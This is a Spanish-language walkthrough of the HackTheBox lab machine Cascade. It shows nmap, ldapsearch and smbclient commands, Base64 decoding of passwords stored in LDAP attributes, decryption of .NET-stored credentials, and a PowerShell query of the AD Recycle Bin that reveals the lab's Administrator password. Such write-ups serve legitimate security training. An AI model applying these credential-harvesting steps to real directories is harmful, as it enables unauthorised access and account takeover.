write-ups / hackthebox / cascade-htb
HackTheBoxmediumWindows
Cascade — LDAP Enum y abuso de Active Directory
Enumeración LDAP de Active Directory en Cascade de HTB. Extracción de credenciales de atributos LDAP, reversing de .NET para descifrar contraseñas y acceso a la papelera de reciclaje de AD.
19 de julio de 20241 min read
HTBActive DirectoryLDAPTightVNC.NET Reversing
Reconocimiento
bash
nmap -sV -sC -oN cascade.nmap 10.10.10.182
Domain Controller . Puertos abiertos: 53, 88, 135, 389, 445, 636, 3268, 5985.
bash
cascade.localEnumeración LDAP
bash
ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" "(objectClass=user)" sAMAccountName cascadeLegacyPwd
El usuario tiene un atributo personalizado con una contraseña en Base64.
bash
r.thompsonbash
cascadeLegacyPwdbash
echo "clk0bjVldmE=" | base64 -d
Password:
bash
rY4n5evaAcceso SMB
bash
smbclient -U 'r.thompson%rY4n5eva' //10.10.10.182/Data
En el share encontramos un registro de VNC con contraseña cifrada y un archivo de configuración de una aplicación .NET llamada .
bash
CascAuditReversing .NET
Decompilamos con dnSpy. La aplicación usa AES-CBC con IV y key hardcodeados para descifrar las contraseñas de la base de datos SQLite .
bash
CascAudit.exebash
Audit.dbCredenciales obtenidas:
bash
ArkSvc:w3lc0meFr31662Papelera de reciclaje de Active Directory
El usuario es miembro del grupo . Podemos recuperar objetos eliminados del Active Directory:
bash
ArkSvcbash
AD Recycle Binpowershell
Get-ADObject -Filter {isDeleted -eq $true} -IncludeDeletedObjects -Properties *
Encontramos el objeto eliminado con su contraseña en .
bash
TempAdminbash
cascadeLegacyPwdbash
echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
Password del Administrator:
bash
baCT3r1aN00dles